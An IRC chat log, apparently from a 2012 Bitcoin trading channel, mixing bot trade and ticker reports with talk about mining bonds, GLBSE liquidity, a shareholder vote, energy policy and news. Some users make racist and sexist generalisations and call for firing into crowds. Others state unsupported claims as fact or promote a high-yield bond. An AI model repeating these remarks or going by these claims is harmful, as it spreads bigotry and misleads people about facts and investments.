[GMVT-BOT] 1 @ 0.12011001 BTC [-] Sep 14 20:05:33 [GLBSE] [GMVT-BOT] 2 @ 0.12011 = 0.2402 BTC [-] Sep 14 20:05:38 !pl JAH 200@0.1 2012-06-12 Sep 14 20:05:39 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 14 20:05:41 JAH [200@0.1BTC] (since: 2012-06-12) paid: 10.26878 BTC. Last price: 0.13 BTC. Capital gain: 6 BTC. Total: 16.26878 BTC. (81.3%) Sep 14 20:06:10 hmm, I'm still doing okay on mining Sep 14 20:06:34 granted, I bought on a dip Sep 14 20:07:18 [GLBSE] [PUREMINING] 1 @ 0.09467999 BTC [+] Sep 14 20:07:19 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 14 20:07:29 JAH [1@BTC] paid: 0.08647365 BTC. Last price: 0.13 BTC. Capital gain: 0.13 BTC. Total: 0.21647365 BTC. (-100%) Sep 14 20:07:29 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 14 20:07:31 JAH [1@0.3BTC] paid: 0.08647365 BTC. Last price: 0.13 BTC. Capital gain: -0.17 BTC. Total: -0.08352635 BTC. (-27.8%) Sep 14 20:07:37 In any case, most fixed bonds loss is due to the fact USD/BTC price raised a lot and thus, difficulty is catching on and the value of the equipment (in BTC) halved, since BTC now buys twice the mhash equipment. Sep 14 20:08:19 and reward will drop Sep 14 20:08:47 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 14 20:09:20 heh, no bids on JAH though Sep 14 20:09:31 so even with my "good" purchase, I can't liquidate Sep 14 20:09:35 Not because mining bonds are inherently bad, but because any raise in USD per BTC undermines the bond values a lot. Sep 14 20:09:44 Not since the last 6 months, since the last 3 months Sep 14 20:09:50 MoneyIsDebt: It has no backing. It might as well be worthless. Sep 14 20:10:31 what do you mean no backing? Sep 14 20:10:39 I've seen pictures of the rigs Sep 14 20:10:44 they could be bullshit of course Sep 14 20:10:49 since btc price started going up fast in June Sep 14 20:10:55 but so could anything on glbse Sep 14 20:10:58 An active price of something someone is willing to pay at a moment's notice Sep 14 20:11:01 http://bitcoindifficulty.com/ < see how it start raising fast in June Sep 14 20:11:23 http://bitcoincharts.com/charts/mtgoxUSD#rg180ztgSzm1g10zm2g21zv Sep 14 20:11:30 [GLBSE] [BITBOND] 1 @ 0.331 BTC [+] Sep 14 20:11:31 [GLBSE] [BITBOND] 1 @ 0.331 BTC [+] Sep 14 20:11:34 See how it coincides with the BTC price raise Sep 14 20:11:40 [MPEX] [S.MPOE] 13900 @ 0.00039789 = 5.5307 BTC [-] Sep 14 20:12:11 nothing much else that provably makes a bitcoin income though Sep 14 20:12:14 so what to invest in? Sep 14 20:12:24 before that difficulty was slowly rising, often dropping as much as it raised. Sep 14 20:12:58 Bane_Capital i read all your forum threads Sep 14 20:13:18 jcpham: Feel free to express your opinion. Sep 14 20:13:28 sorry, no can do Sep 14 20:13:37 http-radio-silence Sep 14 20:14:12 jcpham: So I assume you disapprove. Sep 14 20:14:14 [GLBSE] [BLUECHIP] 4 @ 0.0600001 = 0.24 BTC [-] Sep 14 20:14:35 Bane_Capital: Isn't part of the problem that with X bitcoins, you can only place X bids on glbse? You can't place X bids on all the stuff you're interested in. So liquidity is lower than it could be. Sep 14 20:14:37 Yeah, but my point is, if USD/BTC price stays stable, mining bonds become good. Unfortunatly, BTC is deflationary, which is bad for mining bonds. Sep 14 20:14:49 it is not my job to approve or disapprove sir Sep 14 20:14:52 If BTC was inflationary, I'd say buy mining bonds. Sep 14 20:15:08 EskimoBob: But real life business doesn't grow as fast as the btc/usd price, thus it's still a turd Sep 14 20:15:10 MoneyIsDebt: How does it work in other stock exchanges? Sep 14 20:15:21 generally speaking, yes i disapprove of the bitcointalkforums and the community that supports, it yes Sep 14 20:15:44 some have labeled me social darwinist Sep 14 20:15:50 You place bids on whatever you want. If a bid is met, the bids you can't afford anymore are reduced to whatever funds you have. Sep 14 20:15:57 although i have no clue what that means Sep 14 20:16:29 [GLBSE] [MOORE] 2 @ 0.48 = 0.96 BTC [-] Sep 14 20:16:30 [GLBSE] [MOORE] 1 @ 0.45 BTC [-] Sep 14 20:16:41 MoneyIsDebt: Nefario needs to be made aware of that. Sep 14 20:16:48 He is Sep 14 20:16:52 He tried to implement it Sep 14 20:16:55 but had to roll back Sep 14 20:17:01 I'm sure it'll come at some point Sep 14 20:17:24 [13:12] so what to invest in? Sep 14 20:17:31 I pay 0.5% weekly, fixed. Loan based, no devaluation. Sep 14 20:17:49 BTC-Mining: What ticker? Sep 14 20:18:14 It is a bond. And one which respects the true meaning of the term "bond". Sep 14 20:18:18 It's a bond. Sep 14 20:18:23 loan* Sep 14 20:18:41 BTC-BOND Sep 14 20:20:20 https://docs.google.com/spreadsheet/pub?key=0AvwwyRGyc1WgdGFKVlAtZVAzOGNqS1Brd05MUlFlT2c Sep 14 20:21:05 Use this spreadsheet and links on it to get more information. I think it's exhaustive enough. Sep 14 20:21:09 [GLBSE] [ASICMINER] 23 @ 0.12 = 2.76 BTC [+] Sep 14 20:23:35 [GLBSE] [ASICMINER] 3 @ 0.12 = 0.36 BTC [+] Sep 14 20:24:11 yeah, looks good Sep 14 20:24:22 I'll invest at some random time to hide the fact that it's me Sep 14 20:24:29 :) Sep 14 20:25:29 Well I have to keep it at 200% of loan in assets, so because of variations in price, I'll try and keep it under that. Sep 14 20:26:21 Haven't you seen him on cam4btc? Sep 14 20:26:30 Gets loads of tips Sep 14 20:26:39 ooooooo Sep 14 20:26:43 sounds exciting Sep 14 20:26:51 The assets on the spreadsheet, trading, exchanging. Sometimes I trade on MtGox a bit, when something happens (like the pirate default). Sep 14 20:27:20 [GLBSE] [BTC-BOND] 1000 @ 0.00999999 = 10 BTC [+] Sep 14 20:29:00 Probably because I take on almost all the risks. If any asset makes a loss, I have to eat it up on my share of the portfolio. Sep 14 20:35:48 aye Sep 14 20:36:47 [MPEX] [S.MPOE] 20533 @ 0.00039793 = 8.1707 BTC [+] Sep 14 20:36:48 [MPEX] [S.MPOE] 15734 @ 0.00039835 = 6.2676 BTC [+] Sep 14 20:36:50 [MPEX] [S.MPOE] 17064 @ 0.00039851 = 6.8002 BTC [+] Sep 14 20:50:50 [GLBSE] [ASICMINER] 34 @ 0.1161 = 3.9474 BTC [-] Sep 14 20:50:51 [GLBSE] [ASICMINER] 20 @ 0.116 = 2.32 BTC [-] Sep 14 20:50:52 [GLBSE] [ASICMINER] 1 @ 0.115 BTC [-] Sep 14 20:52:15 [GLBSE] [ASICMINER] 6 @ 0.1199 = 0.7194 BTC [+] Sep 14 20:52:17 [GLBSE] [ASICMINER] 392 @ 0.12 = 47.04 BTC [+] Sep 14 20:52:41 [GLBSE] [ASICMINER] 17 @ 0.12 = 2.04 BTC [+] Sep 14 20:59:20 Just finished Atlas Shrugged the movie. It wasn't too bad. Clearly low budget but not bad. Sep 14 20:59:35 I understand why most people would be bored by it. Sep 14 21:00:22 [GLBSE] [CIUCIU.BOND] 12 @ 0.11 = 1.32 BTC [+] Sep 14 21:02:03 [MPEX] [S.MPOE] 26004 @ 0.00039851 = 10.3629 BTC [+] Sep 14 21:04:50 [GLBSE] [JTME] 2 @ 0.65 = 1.3 BTC [+] Sep 14 21:05:14 No, some say he named himself after the book Sep 14 21:05:14 [GLBSE] [NYAN.B] 1 @ 0.9899 BTC [+] Sep 14 21:05:16 which he didn't Sep 14 21:05:35 Usagi: I think you might enjoy it. Basically it's about industry leaders going on strike. Sep 14 21:06:08 It's television quality besides that Sep 14 21:06:09 yeah. Sep 14 21:06:19 That's why most people hate it. Sep 14 21:06:31 They are making a part 2 right now. Sep 14 21:06:46 It has a Pirate in it. Sep 14 21:06:51 So a bit of a fun bit there. Sep 14 21:07:11 http://en.wikipedia.org/wiki/List_of_Atlas_Shrugged_characters#Ragnar_Danneskj.C3.B6ld Sep 14 21:09:33 It's not really about industry leaders going on strike though Sep 14 21:10:03 It's about increased regulation forcing those leaders to take their business elsewhere Sep 14 21:10:21 Like all manufacturing being moved to china and taiwan Sep 14 21:10:29 or software being outsourced to India Sep 14 21:10:38 to put it in a more modern setting than the book Sep 14 21:10:40 ;;ticker Sep 14 21:10:41 Best bid: 11.66001, Best ask: 11.66222, Bid-ask spread: 0.00221, Last trade: 11.66, 24 hour volume: 38845, 24 hour low: 11.30112, 24 hour high: 11.66 Sep 14 21:10:52 nice delay there Sep 14 21:10:58 (which is recommended over the movie btw) Sep 14 21:11:01 ;;ticker Sep 14 21:11:02 Best bid: 11.69, Best ask: 11.75, Bid-ask spread: 0.06000, Last trade: 11.75, 24 hour volume: 40042, 24 hour low: 11.30112, 24 hour high: 11.75 Sep 14 21:11:15 Anyone here that's going to the conference tomorrow? :D Sep 14 21:12:55 What conference? Sep 14 21:14:27 www.bitcoin2012.com Sep 14 21:14:33 London Bitcoin Conference Sep 14 21:14:55 [GLBSE] [ASICMINER] 6 @ 0.119899 = 0.7194 BTC [-] Sep 14 21:14:56 [GLBSE] [ASICMINER] 4 @ 0.12 = 0.48 BTC [+] Sep 14 21:15:44 [GLBSE] [FOO.PPPPT] 100 @ 0.0200001 = 2 BTC [-] Sep 14 21:15:46 [GLBSE] [FOO.PPPPT] 4 @ 0.02 = 0.08 BTC [-] Sep 14 21:16:02 ;;ticker Sep 14 21:16:03 Best bid: 11.72138, Best ask: 11.75, Bid-ask spread: 0.02862, Last trade: 11.75, 24 hour volume: 40217, 24 hour low: 11.30112, 24 hour high: 11.75 Sep 14 21:17:43 A bit far for me... Sep 14 21:17:53 but it might push the price a bit Sep 14 21:20:51 [GLBSE] [ASICMINER] 4 @ 0.1124001 = 0.4496 BTC [-] Sep 14 21:20:53 [GLBSE] [ASICMINER] 10 @ 0.11220133 = 1.122 BTC [-] Sep 14 21:20:54 [GLBSE] [ASICMINER] 10 @ 0.11220121 = 1.122 BTC [-] Sep 14 21:20:55 [GLBSE] [ASICMINER] 10 @ 0.11210121 = 1.121 BTC [-] Sep 14 21:20:56 [GLBSE] [ASICMINER] 25 @ 0.1121012 = 2.8025 BTC [-] Sep 14 21:20:57 [GLBSE] [ASICMINER] 45 @ 0.1120011 = 5.04 BTC [-] Sep 14 21:20:58 [GLBSE] [ASICMINER] 36 @ 0.10960001 = 3.9456 BTC [-] Sep 14 21:20:59 [GLBSE] [ASICMINER] 20 @ 0.10950001 = 2.19 BTC [-] Sep 14 21:21:00 [GLBSE] [ASICMINER] 20 @ 0.1095 = 2.19 BTC [-] Sep 14 21:21:01 [GLBSE] [ASICMINER] 9 @ 0.1091 = 0.9819 BTC [-] Sep 14 21:21:03 [GLBSE] [ASICMINER] 30 @ 0.10900001 = 3.27 BTC [-] Sep 14 21:21:04 [GLBSE] [ASICMINER] 2 @ 0.109 = 0.218 BTC [-] Sep 14 21:21:05 [GLBSE] [ASICMINER] 100 @ 0.109 = 10.9 BTC [-] Sep 14 21:21:06 [GLBSE] [ASICMINER] 2 @ 0.1085 = 0.217 BTC [-] Sep 14 21:21:58 [GLBSE] [ASICMINER] 2 @ 0.10696525 = 0.2139 BTC [-] Sep 14 21:21:59 [GLBSE] [ASICMINER] 10 @ 0.10601 = 1.0601 BTC [-] Sep 14 21:22:33 [GLBSE] [ASICMINER] 3 @ 0.10511355 = 0.3153 BTC [-] Sep 14 21:23:51 rally? Sep 14 21:23:58 ;;ticker Sep 14 21:23:59 Best bid: 11.711, Best ask: 11.75, Bid-ask spread: 0.03900, Last trade: 11.711, 24 hour volume: 40340, 24 hour low: 11.30112, 24 hour high: 11.75 Sep 14 21:24:15 ;;ticker Sep 14 21:24:15 Best bid: 11.711, Best ask: 11.75, Bid-ask spread: 0.03900, Last trade: 11.711, 24 hour volume: 40340, 24 hour low: 11.30112, 24 hour high: 11.75 Sep 14 21:24:55 ;;ticker Sep 14 21:24:56 Best bid: 11.71, Best ask: 11.78098, Bid-ask spread: 0.07098, Last trade: 11.78098, 24 hour volume: 40555, 24 hour low: 11.30112, 24 hour high: 11.799 Sep 14 21:26:01 [GLBSE] [GMVT-BOT] 5 @ 0.139999 = 0.7 BTC [+] Sep 14 21:26:02 [GLBSE] [GMVT-BOT] 42 @ 0.13999999 = 5.88 BTC [+] Sep 14 21:26:03 [GLBSE] [GMVT-BOT] 39 @ 0.14 = 5.46 BTC [+] Sep 14 21:26:04 [GLBSE] [GMVT-BOT] 8 @ 0.15 = 1.2 BTC [+] Sep 14 21:26:05 [GLBSE] [NASTY] 2 @ 0.5553 = 1.1106 BTC [+] Sep 14 21:27:06 [GLBSE] [NASTY] 8 @ 0.5553 = 4.4424 BTC [+] Sep 14 21:27:18 [MPEX] [S.MPOE] 13805 @ 0.00039851 = 5.5014 BTC [+] Sep 14 21:27:20 [MPEX] [S.MPOE] 4300 @ 0.00039858 = 1.7139 BTC [+] Sep 14 21:27:21 [MPEX] [S.MPOE] 24319 @ 0.00039878 = 9.6979 BTC [+] Sep 14 21:27:22 [MPEX] [S.MPOE] 7700 @ 0.00039878 = 3.0706 BTC [+] Sep 14 21:27:24 [MPEX] [S.MPOE] 2376 @ 0.00039885 = 0.9477 BTC [+] Sep 14 21:29:25 [GLBSE] [GSDPT] 1260 @ 0.0034 = 4.284 BTC [+] Sep 14 21:30:26 [GLBSE] [GSDPT] 42 @ 0.0034 = 0.1428 BTC [+] Sep 14 21:32:06 [GLBSE] [GIGAMINING] 6 @ 0.6195 = 3.717 BTC [+] Sep 14 21:32:31 ;;asks 12 Sep 14 21:32:33 There are currently 11135.246 bitcoins offered at or under 12.0 USD, worth 132960.36825 USD in total. Sep 14 21:32:44 [GLBSE] [GIGAMINING] 8 @ 0.61958 = 4.9566 BTC [+] Sep 14 21:32:45 ;;asks 13 Sep 14 21:32:47 There are currently 43475.871 bitcoins offered at or under 13.0 USD, worth 534979.043223 USD in total. Sep 14 21:33:07 ;;bids 10 Sep 14 21:33:08 There are currently 51206.932 bitcoins demanded at or over 10.0 USD, worth 555374.394154 USD in total. Sep 14 21:33:47 [GLBSE] [GIGAMINING] 26 @ 0.62 = 16.12 BTC [+] Sep 14 21:34:17 !pl gigamining 0.58 Sep 14 21:34:17 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 14 21:34:36 !pl gigamining 0.58 2012-08-10 Sep 14 21:34:43 ;;ticker Sep 14 21:34:44 Best bid: 11.721, Best ask: 11.72999, Bid-ask spread: 0.00899, Last trade: 11.72999, 24 hour volume: 40695, 24 hour low: 11.30112, 24 hour high: 11.799 Sep 14 21:34:45 All these people buying gigamining need to get an account on MPEX and buy from me at a 15% discount Sep 14 21:34:48 GIGAMINING [1@0.58BTC] paid: 0.44317596 BTC. Last price: 0.62 BTC. Capital gain: 0.04 BTC. Total: 0.48317596 BTC. (83.3%) Sep 14 21:34:48 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 14 21:35:05 GIGAMINING [1@0.58BTC] (since: 2012-08-10) paid: 0.07725 BTC. Last price: 0.62 BTC. Capital gain: 0.04 BTC. Total: 0.11725 BTC. (20.2%) Sep 14 21:35:17 ;;ticker F.GIGA.ETF Sep 14 21:35:17 (ticker [--bid|--ask|--last|--high|--low]) -- Return pretty-printed mtgox ticker. If one of the options is given, returns only that numeric result (useful for nesting in calculations). Sep 14 21:35:47 [GLBSE] [ASICMINER] 4 @ 0.119799 = 0.4792 BTC [+] Sep 14 21:43:39 !help Sep 14 21:43:39 List of commands: Sep 14 21:43:40 !ticker (desc: returns current GLBSE/MPEX ticker values) Sep 14 21:43:41 !pl [@] [] (desc: profit loss calc for GLBSE assets) Sep 14 21:43:54 [MPEX] [O.BTCUSD.C110T] 5 @ 0.15483157 = 0.7742 BTC [-] Sep 14 21:44:38 !ticker F.GIGA.ETF Sep 14 21:44:39 [MPEX:F.GIGA.ETF] 1day: 0.00039054 / 0.00042374 / 0.000485 (871345 shares, 369.23 BTC), 30day: 0.00030644 / 0.000769 / 0.00113797 (13934052 shares, 10,715.35 BTC) Sep 14 21:48:23 [GLBSE] [PUREMINING] 1 @ 0.08899999 BTC [-] Sep 14 21:50:06 [GLBSE] [UDN] 1 @ 0.05493999 BTC [+] Sep 14 21:50:58 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 14 22:05:04 meh Sep 14 22:05:07 whats with people today Sep 14 22:05:12 its like they let all the loonies out Sep 14 22:05:40 [GLBSE] [GIGAMINING] 1 @ 0.62 BTC [+] Sep 14 22:05:49 one, outside the kansans city federal building, there might be a bomb inside the car of a self proclaimed terrorist Sep 14 22:06:17 two, a third american embassy was attacked over a troll video from a pcp addict Sep 14 22:07:34 third, intel announces their new atom cant run linux Sep 14 22:08:13 that means their ONLY market for low power x86 (tiny netbooks and >10" super tablets) cant actually run their product Sep 14 22:08:35 [GLBSE] [ASICMINER] 3 @ 0.11968989 = 0.3591 BTC [-] Sep 14 22:08:55 [MPEX] [S.MPOE] 27700 @ 0.00039818 = 11.0296 BTC [-] Sep 14 22:09:19 that new atom cant Sep 14 22:09:24 windows 8 only Sep 14 22:09:29 Slashdot says they are lying. Sep 14 22:09:36 OneMiner: well Sep 14 22:09:41 if its related to the gpu Sep 14 22:09:52 and intel doesnt support it with their new driver stack Sep 14 22:09:57 then intel legitimately can claim it Sep 14 22:10:03 I dont think its drm related Sep 14 22:10:09 none of the news stories are saying why Sep 14 22:10:35 usagi: also Sep 14 22:10:36 if I were you Sep 14 22:10:43 I'd look for a ulv fusion if amd has them out in time Sep 14 22:10:49 Ya, I'll bet they don't know. Intel just listed it like it's a feature and left it like that probably. Sep 14 22:11:26 no, I'd get laid, and then go back to being diablo Sep 14 22:11:52 not that again Sep 14 22:12:00 THERE ARE NO WOMEN ON THE INTERTUBES Sep 14 22:12:10 haha Sep 14 22:12:24 DOUBLY SO FOR THE BITCOIN COMMUNITY Sep 14 22:12:33 [GLBSE] [RSM] 34 @ 0.3 = 10.2 BTC [+] Sep 14 22:13:21 you're asian, you ALL look androgynous Sep 14 22:15:36 Adrogyny is sexy Sep 14 22:15:37 Anyone claiming to be female in the bitcoin community should do that with a doctors note if anybody is going to belive them. Sep 14 22:15:39 To me at least. Sep 14 22:15:52 ffs, now intel claims they have jelly bean running on that new atom Sep 14 22:15:53 It used to be in the 50s at least. Sep 14 22:16:17 [GLBSE] [FUTUREFUND] 5 @ 0.00012682 = 0.0006 BTC [+] Sep 14 22:16:45 MAKE UP YOUR MIND INTEL Sep 14 22:16:56 EITHER YOU'RE IDIOTS OR IDIOTS Sep 14 22:17:01 CANT BE BOTH... oy wait Sep 14 22:18:59 jesus christ Sep 14 22:19:10 also, paul graham should quit faxing photos of his penis to google Sep 14 22:22:58 [GLBSE] [HYDRO.BONDS] 2 @ 1.4001 = 2.8002 BTC [+] Sep 14 22:23:00 [GLBSE] [HYDRO.BONDS] 2 @ 1.4 = 2.8 BTC [-] Sep 14 22:24:38 http://gigaom.com/cleantech/behold-apples-massive-solar-farm-from-the-sky-photos/ Sep 14 22:24:41 DO WANT Sep 14 22:24:42 I hope the marines at the US embassys can just fire into crowds that are attacking them. Pass out the ammo! Sep 14 22:25:06 OneMiner: actually thats the massively hilarious part Sep 14 22:25:13 the libyan embassy had no marine protection Sep 14 22:25:24 at least 3 people were killed because of it Sep 14 22:25:25 wtf serious? Sep 14 22:25:36 one of them a well known video game player Sep 14 22:26:06 http://www.technologyreview.com/view/429203/room-temperature-superconductivity-found-in/ Sep 14 22:26:08 I caught that. I had no idea. I thought they always had marines. Sep 14 22:26:14 _WTF_ Sep 14 22:26:21 fuck the terrorists, what the fuck is this shit Sep 14 22:26:49 That is sick. It's years and years away though. They are probably messing with tiny little specs of that stuff. Sep 14 22:27:02 I wouldn't classify them as terrorists. They are just mad, religious nutters. Sep 14 22:27:15 Bane_Capital: no Sep 14 22:27:19 A terrorist is more organized. Sep 14 22:27:25 under US law they COULD be arrested for inciting violence Sep 14 22:27:36 since it happened on the embassy grounds, it happened inside the united states Sep 14 22:27:40 Oh, the other people. Sep 14 22:27:42 Oh nvm Sep 14 22:27:50 the film makers Sep 14 22:28:02 they can also be charged with the hate crime bonus round Sep 14 22:28:08 where we double their life sentences. Sep 14 22:29:48 I think it's in very poor taste to make that movie or even the trailer. They should just drop this. But it's an important freedom. They'll never be prosecuted. Sep 14 22:30:28 No Sep 14 22:30:57 95% chance the superconductor story does not pan out. Sep 14 22:32:55 who knows Sep 14 22:33:15 it almost sounds like its naturally forming carbon nanofiber cyrstal chains Sep 14 22:33:20 Have you seen the trailer? It's not even funny. It's just insulting, some of it sounded historicaly true but it's presented in a very biased way. Sep 14 22:33:29 we already know specially doped diamonds are conductors Sep 14 22:33:43 OneMiner: mohammad had a loli fetish Sep 14 22:33:49 who cares, that was the norm back then Sep 14 22:34:00 [MPEX] [S.MPOE] 10685 @ 0.00039818 = 4.2546 BTC [-] Sep 14 22:34:01 [MPEX] [S.MPOE] 1515 @ 0.00039789 = 0.6028 BTC [-] Sep 14 22:34:24 Diamod transistors are the shizz. I want a gigaflop grill. Sep 14 22:35:02 He's stupid in the trailer too. It's obviously ment to make people angry. Sep 14 22:36:00 usagi: not really Sep 14 22:36:17 Diablo-D3: Sorry, that story smells like total horseshit. Flaky material, only works sometimes, no observation of resistance loss, etc etc I am upping it to 99.9% bullshit Sep 14 22:36:18 I hate that too usagi. Sep 14 22:36:22 they proved they cant be trusted with nuclear reactors Sep 14 22:36:27 It's so silly. Sep 14 22:36:30 they had a chance to shut this plant down 20 years ago Sep 14 22:36:31 they didnt Sep 14 22:36:33 they paid the price Sep 14 22:36:40 usagi: not really Sep 14 22:36:46 japan has GREAT coastal wind Sep 14 22:36:56 they could supply all their power needs with wind alone Sep 14 22:37:05 no gas or diesel anyhwere Sep 14 22:37:14 tokyo being lit up like new york, everything Sep 14 22:37:15 all wind Sep 14 22:37:27 No, people don't understand. They think that non-nuclear is "green" because there won't be any fallout. Sep 14 22:37:37 OneMiner: nuclear IS green though Sep 14 22:38:07 Yes, I think it is. But Joe Whatever from Japan thinks that they give him lung cancer. Sep 14 22:38:09 take all the nculear stuff in the world, including the worst accidents Sep 14 22:38:19 usagi: solar might get cost effective very soon Sep 14 22:38:25 solar is close Sep 14 22:38:32 including both chernobyl and the concrete lake Sep 14 22:38:42 including both nuclear bombs and all the bomb testing Sep 14 22:38:43 _all of it_ Sep 14 22:38:44 and potentially, fusion, although there's a load of improvements to be made before that happens. Sep 14 22:38:48 measure the radioactive output Sep 14 22:38:52 thats what coal does per year. Sep 14 22:39:00 coal outputs that much radioactive material per year. Sep 14 22:39:21 [GLBSE] [GSDPT] 25 @ 0.00339999 = 0.085 BTC [-] Sep 14 22:39:29 all the radiation with nuclear FOREVER is what coal does per year. Sep 14 22:39:43 also, solar already is cost effective Sep 14 22:39:45 I agree still. The radiation released isn't at a dangerous level for the globe. Chernobyl was a very similar accident to Fukushima in a way, in that they ignored safety until it exploded in their faces. Sep 14 22:39:57 OneMiner: oh, its extremely dangerous Sep 14 22:40:03 people are getting cancer because of it Sep 14 22:40:11 cancer rates near coal plants is much higher than the norm Sep 14 22:40:34 now, to be fair, coal also causes cancer with several other emissions Sep 14 22:40:41 [GLBSE] [YABMC] 1 @ 0.0999 BTC [+] Sep 14 22:40:42 so its not all radioactive related cancers Sep 14 22:40:43 Yes, that's my understanding as well. I'd like to ban burning coal ASAP. Vote OneMiner for world dictator! Sep 14 22:41:07 Diablo, it's cost effective in that it can bring a profit, but it's not in the sense that it's cheap to produce. Sep 14 22:41:15 BTC-Mining: no, its actually cheap to produce Sep 14 22:41:26 problem is its the volume fucking companies Sep 14 22:41:34 plus the republicans throwing money at scams Sep 14 22:41:36 You make em once and they keep producing for a long time. Sep 14 22:41:43 30 years. Sep 14 22:42:17 Also you can build a more distributed grid that's resistant to black/brown outs. Sep 14 22:42:32 anyhow Sep 14 22:42:37 With residential solar that is. Sep 14 22:42:39 why do you think I went with a solar/wind split for DMC? Sep 14 22:43:03 because I get the best of both worlds at a price cheaper than outright buying the electricity from the power company Sep 14 22:43:18 especially when you factor in the next 30 years of power price increases Sep 14 22:43:20 It's clear that it would save money in the long run. Sep 14 22:43:38 ESPECIALLY when you realize they're mandated by law to buy power from me at retail prices Sep 14 22:43:44 Fingers crossed for the tokamak. Sep 14 22:45:28 usagi: you know, no one knows how the largest shareholder is going to vote Sep 14 22:46:23 [GLBSE] [GSDPT] 10 @ 0.00339999 = 0.034 BTC [-] Sep 14 22:46:42 you're not the largest Sep 14 22:47:05 [GLBSE] [BBBB] 100 @ 0.0002 = 0.02 BTC [+] Sep 14 22:47:16 someone out there has about 10k Sep 14 22:49:28 well, if you dont vote, thats just like voting yes because of how nefario wrote the motion Sep 14 22:52:17 [GLBSE] [FUTUREFUND] 1 @ 0.00012682 BTC [+] Sep 14 22:52:29 why do you think I wish I could find a way off glbse? Sep 14 22:53:09 The voting is kept secret until the motion is finished? Sep 14 22:53:14 OneMiner: yes Sep 14 22:53:17 which is dishonest Sep 14 22:57:21 The operation succeeded. Sep 14 22:57:48 [GLBSE] [TYGRR.BOND-P] 10 @ 0.035 = 0.35 BTC [-] Sep 14 22:59:13 [MPEX] [S.MPOE] 15200 @ 0.00039789 = 6.0479 BTC [-] Sep 14 23:03:30 [GLBSE] [ASICMINER] 10 @ 0.11699999 = 1.17 BTC [-] Sep 14 23:06:21 dishonest? All motions have no numbers shown until it's done... that's like saying you could see votes live during elections before voting is closed. Way to encourage/discourage people. Sep 14 23:13:00 [GLBSE] [GSDPT] 22 @ 0.0033999 = 0.0748 BTC [-] Sep 14 23:13:45 BTC-Mining: but we CAN see voting numbers before elections are closed Sep 14 23:14:19 usagi: its up to you to vote, but if you vote yes now, you basically are telling everyone that you never believed in the plan and were just in it for the money Sep 14 23:16:01 Theres a difference between making money legitimately and being a greedy fuck. Sep 14 23:16:14 I like making my money legitimately, the question is which of those two do you want to be Sep 14 23:16:48 I dont care if you are or if you arent Sep 14 23:16:54 nyan and bmf's ass is on the line too Sep 14 23:17:07 anyone who has ever invested in dmc or dmc has invested in them, we're all going to sink or swim here Sep 14 23:17:32 yes, but will bmf shareholders write off bmf? Sep 14 23:17:46 [GLBSE] [FPGAMINING] 6 @ 0.65 = 3.9 BTC [+] Sep 14 23:18:04 I dont think you realize how honest and straightforward the community is. Sep 14 23:18:19 If you decide that you were in it just to be greedy, then why in hell would anyone invest in you ever again? Sep 14 23:18:53 usagi: I lost about 1000 BTC total in money. Sep 14 23:19:24 yes, I already said the fixed mhash bond shit was not my finest moment. Sep 14 23:19:33 nefario still has done nothing about it, and I simply dont care. Sep 14 23:20:08 usagi: yes, I may have helped collapse the market. Sep 14 23:20:14 but we'll never know Sep 14 23:20:48 yes, but bmf's assets decreased the whole time Sep 14 23:21:16 usagi: yes, and then I handed the asicminer over to abmo for 0.10 of asicminer for 0.20 of abmo. Sep 14 23:21:31 I traded future profits for both future profits and profits now. Sep 14 23:21:37 while doubling the value of the asset Sep 14 23:23:19 Diablo-D3, 99% of the people are against you. The remaining 1% is yourself. Maybe you should requestion your methods. Most of your trades were at a loss comparing both asset's current market price. It might have been an increase in (or in potential) mhash/s. But the thing is, you'd have gotten more mhash/s selling at market price and buying the other at market price. Sep 14 23:23:40 BTC-Mining: nope Sep 14 23:23:58 because that assumes GLBSE has market liquidity Sep 14 23:23:59 it doesnt Sep 14 23:24:06 people cant sell out of their positions because no one is buying Sep 14 23:24:22 liquidity is small but I usually manage to buy/sell at market rate. Sep 14 23:24:27 that means DMC would have had no investors Sep 14 23:24:43 [MPEX] [S.MPOE] 2584 @ 0.00039789 = 1.0281 BTC [-] Sep 14 23:24:45 [MPEX] [S.MPOE] 13600 @ 0.00039723 = 5.4023 BTC [-] Sep 14 23:24:46 [MPEX] [S.MPOE] 8816 @ 0.00039652 = 3.4957 BTC [-] Sep 14 23:25:02 I reckon other mining funds managed to buy/sell assets at market rate... Sep 14 23:28:12 BTC-Mining: no Sep 14 23:28:18 look at the assets that have no bids atm Sep 14 23:28:20 <[\\\]> lol Sep 14 23:28:23 <[\\\]> are you kidding? Sep 14 23:28:24 but the asks are 0.10 Sep 14 23:28:28 <[\\\]> there is no market depth Sep 14 23:28:53 <[\\\]> couple hundred shares in any asset could bring them to 0 Sep 14 23:28:57 neither of those represent the market rate (its about 0.01) Sep 14 23:29:18 imsaguy is right Sep 14 23:29:22 whatever happened to the glbse liquidty / reserve update Sep 14 23:29:30 teek: gone Sep 14 23:29:34 nefario never implemented it afaik Sep 14 23:29:41 he did implement it Sep 14 23:29:44 but it was buggy Sep 14 23:29:49 heh, nice =/ Sep 14 23:29:52 i saw it implemented for a cpl hours Sep 14 23:29:56 then it got rolled back Sep 14 23:30:08 So, I dunno Sep 14 23:30:13 [GLBSE] [OBSI.HRPT] 1 @ 0.09949985 BTC [-] Sep 14 23:30:15 That might be true, but when orders appear on the market (buy), they get filled. Just watch for one. Sep 14 23:30:24 I think if I remain CEO, I'll end the trade program Sep 14 23:30:26 [GLBSE] [OBSI.HRPT] 8 @ 0.09949985 = 0.796 BTC [-] Sep 14 23:30:28 [GLBSE] [OBSI.HRPT] 30 @ 0.09949986 = 2.985 BTC [+] Sep 14 23:30:29 [GLBSE] [OBSI.HRPT] 31 @ 0.09949999 = 3.0845 BTC [+] Sep 14 23:30:30 [GLBSE] [OBSI.HRPT] 6 @ 0.0995 = 0.597 BTC [+] Sep 14 23:31:02 its not worth the problems. Sep 14 23:31:33 <[\\\]> he rolled it out Sep 14 23:31:37 <[\\\]> and then all the bids got trashed Sep 14 23:31:48 <[\\\]> so he had to remove the changes Sep 14 23:33:21 that is basically the reason there is no liquidity on glbse Sep 14 23:33:32 even trading on the real markets Sep 14 23:33:40 you don't only bid for one thing with the same money Sep 14 23:43:46 Is there some kind 